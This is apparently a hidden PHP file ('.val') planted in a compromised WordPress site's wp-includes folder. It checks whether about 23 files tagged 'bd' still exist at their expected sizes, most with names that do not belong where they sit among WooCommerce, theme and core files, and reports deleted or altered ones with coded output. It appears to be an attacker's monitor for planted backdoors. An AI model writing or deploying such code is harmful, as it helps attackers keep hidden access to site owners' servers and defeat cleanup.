/home/ramtczxy/exoticcockatoos.com/wp-includes/.val
<?php   $r = '/home/ramtczxy/exoticcockatoos.com'; $x = ["/fput.php"=>"bd@@245633552@@831",
"/wp-includes/html-api/html5-named-character-references.php"=>"bd@@246705941@@80829",
"/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/generic/product-section/prune.inc.php"=>"bd@@245748758@@1548",
"/Detect.php"=>"bd@@245660719@@611",
"/wp-content/plugins/woocommerce/src/Blocks/Integrations/tplfile.php"=>"bd@@245749298@@591",
"/wp-content/plugins/woocommerce/vendor/automattic/jetpack-connection/src/identity-crisis/class.identity.crisis.php"=>"bd@@245749565@@626",
"/wp-content/plugins/woocommerce/patterns/just-arrived-full-hero.php"=>"bd@@245882956@@2860",
"/wp-includes/class-IXR.php"=>"bd@@245937485@@3176",
"/wp-content/themes/flatsome/inc/admin/options/pages/meta/meta.box.framework.php"=>"bd@@246107984@@689",
"/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-sale-price-field/verification.php"=>"bd@@245927009@@625",
"/installer.php"=>"bd@@246278519@@561",
"/wp-content/themes/flatsome/inc/admin/kirki/controls/php/class.kirki.control.date.php"=>"bd@@245748877@@1530",
"/wp-includes/rest-api/endpoints/class-wp-rest-widget-types-controller.php"=>"bd@@246263978@@19860",
"/wp-content/plugins/woocommerce/vendor/pelago/emogrifier/src/Css/index.php"=>"bd@@245748915@@2305",
"/wp-content/plugins/woocommerce/packages/email-editor/src/Engine/Renderer/ContentRenderer/Postprocessors/interface.highlighting.style.php"=>"bd@@246435004@@588",
"/wp-content/plugins/woocommerce/packages/email-editor/src/Integrations/Core/class.initializer.php"=>"bd@@245748668@@2145",
"/wp-content/plugins/woocommerce/packages/blueprint/src/Schemas/cc.php"=>"bd@@245750218@@2251",
"/wp-content/plugins/woocommerce/packages/action-scheduler/classes/ActionScheduler_DateTime.php"=>"bd@@246506957@@2760",
"/wp-content/plugins/woocommerce/src/Admin/API/Reports/Downloads/page.php"=>"bd@@245940435@@678",
"/wp-content/plugins/woocommerce/assets/client/admin/marketing-coupons/db_tracking.php"=>"bd@@245750229@@620",
"/wp-content/plugins/woocommerce/src/Internal/Admin/Notes/joomgallery.html.php"=>"bd@@245750244@@1882",
"/wp-content/plugins/woocommerce/vendor/sabberworm/php-css-parser/src/RuleSet/quotes.php"=>"bd@@245749478@@2648",
"/wp-content/plugins/woocommerce/src/StoreApi/Routes/V1/AI/pagetree.php"=>"bd@@245750000@@1527"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');